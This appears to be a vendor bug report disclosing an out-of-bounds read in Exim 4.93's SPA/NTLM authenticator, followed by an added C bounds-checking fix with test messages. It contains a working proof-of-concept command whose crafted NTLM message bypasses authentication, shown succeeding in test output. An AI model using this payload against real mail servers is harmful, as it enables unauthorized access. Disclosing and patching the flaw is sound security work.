https://bugs.exim.org/show_bug.cgi?id=2571
Bug ID: 2571
Summary: Out-of-bound buffer read leads to authentication bypass in Exim SPA authentication method
Product: Exim
Version: 4.93
Hardware: x86-64
OS: Linux
Status: NEW
Severity: security
Priority: medium
Component: SMTP Authentication
Assignee: jgh146exb@???
Reporter: orange@???
CC: exim-dev@???
Hi, Exim security team.
I am Orange Tsai from the DEVCORE security team. We just did a little audit on
authentication mechanisms, and found an out-of-bounds buffer read in the SPA
implementation.
In `spa.c`, there is no check on the user-supplied NTLM authentication message.
Since NTLM is an encoded structure, an attacker can supply a customized `length`
and `offset` to read arbitrary memory addresses.
For example:
The SPA username/password challenge check is in `spa.c#248`.
https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249
Since we control the whole `responseptr`, we can adjust the `offset` to the
address of `ntRespData` to bypass this authentication. Here is the PoC:
```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA"; echo -ne 'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00' | base64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1
**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!
>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>> alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)
220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")
250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>> $auth1 = orange
>>> $1 = orange
235 Authentication succeeded
221 ubuntu closing connection
```
Our configuration:
```
$ cat /usr/exim/configure
...
spa:
driver = spa
public_name = NTLM
server_password = ${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...
$ cat /etc/exim/spa_clearpass
orange:orange
```
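The missing check the report describes is a bounds check on the length/offset pair that NTLM uses to locate each variable field (user name, NT response, and so on) inside the authenticate message. As an added example that is not from the report and not Exim's `spa.c` code, the C function below resolves such a "security buffer" only after confirming that both the descriptor and the field it points at lie inside the bytes actually received, so a caller can never be handed a pointer past the end of the message. The eight-byte little-endian layout (u16 length, u16 allocated length, u32 offset) is the standard NTLM layout and is assumed here; the three sample messages are constructed for the demonstration and are not the PoC bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* NTLM "security buffer": u16 length, u16 allocated length, u32 offset from
 * the start of the message, all little-endian. Standard NTLM layout, assumed
 * here; this is not Exim's spa.c code. */
#define NTLM_SECBUF_SIZE 8

static uint16_t rd16le(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] << 8));
}

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Resolve the field described by the security buffer at byte `desc_off`
 * of a `msg_len`-byte message. Returns a pointer into `msg` and stores the
 * field length in *out_len, or returns NULL if the descriptor itself or the
 * field it points at would fall outside the received message. */
const uint8_t *ntlm_field(const uint8_t *msg, size_t msg_len,
                          size_t desc_off, size_t *out_len)
{
    uint16_t len;
    uint32_t offset;

    if (msg == NULL || out_len == NULL) return NULL;
    /* The descriptor must fit; written as a subtraction so it cannot overflow. */
    if (desc_off > msg_len || msg_len - desc_off < NTLM_SECBUF_SIZE) return NULL;

    len = rd16le(msg + desc_off);       /* allocated length at +2 is not needed */
    offset = rd32le(msg + desc_off + 4);

    /* The field must lie entirely inside the message. Checking offset first and
     * then comparing len against the remaining space avoids offset + len
     * wrapping around in 32-bit arithmetic. */
    if (offset > msg_len) return NULL;
    if ((size_t)len > msg_len - offset) return NULL;

    *out_len = len;
    return msg + offset;
}

/* Constructed 26-byte Type 3-style message: 8-byte signature, 4-byte type,
 * one security buffer at offset 12 describing the 6-byte field at offset 20. */
static const uint8_t valid_msg[] = {
    'N','T','L','M','S','S','P',0,  0x03,0,0,0,
    0x06,0x00, 0x06,0x00, 0x14,0x00,0x00,0x00,
    'o','r','a','n','g','e'
};

/* Constructed: same header, but the descriptor claims 14 bytes at offset
 * 0x470, far beyond the 20 bytes actually received. */
static const uint8_t oob_msg[] = {
    'N','T','L','M','S','S','P',0,  0x03,0,0,0,
    0x0e,0x00, 0x0e,0x00, 0x70,0x04,0x00,0x00
};

/* Constructed: offset near 2^32, where a naive offset + len check would wrap. */
static const uint8_t wrap_msg[] = {
    'N','T','L','M','S','S','P',0,  0x03,0,0,0,
    0x02,0x00, 0x02,0x00, 0xff,0xff,0xff,0xff
};

/* Returns 1 if the well-formed message resolves to the expected 6-byte field. */
int valid_message_accepted(void)
{
    size_t n = 0;
    const uint8_t *f = ntlm_field(valid_msg, sizeof valid_msg, 12, &n);
    return f != NULL && n == 6 && memcmp(f, "orange", 6) == 0;
}

/* Returns 1 if both malformed descriptors are rejected with NULL. */
int malformed_messages_rejected(void)
{
    size_t n = 0;
    return ntlm_field(oob_msg, sizeof oob_msg, 12, &n) == NULL &&
           ntlm_field(wrap_msg, sizeof wrap_msg, 12, &n) == NULL;
}

int main(void)
{
    printf("valid message accepted: %d\n", valid_message_accepted());
    printf("malformed messages rejected: %d\n", malformed_messages_rejected());
    return 0;
}
```

The point of the two-step comparison is that `offset + len` computed in 32-bit arithmetic can wrap back into range and pass a single `<= msg_len` test; comparing `len` against the space remaining after `offset` has no such failure mode, and every field a server goes on to compare against its own computed response is then guaranteed to come from the received message rather than from wherever the attacker's offset points.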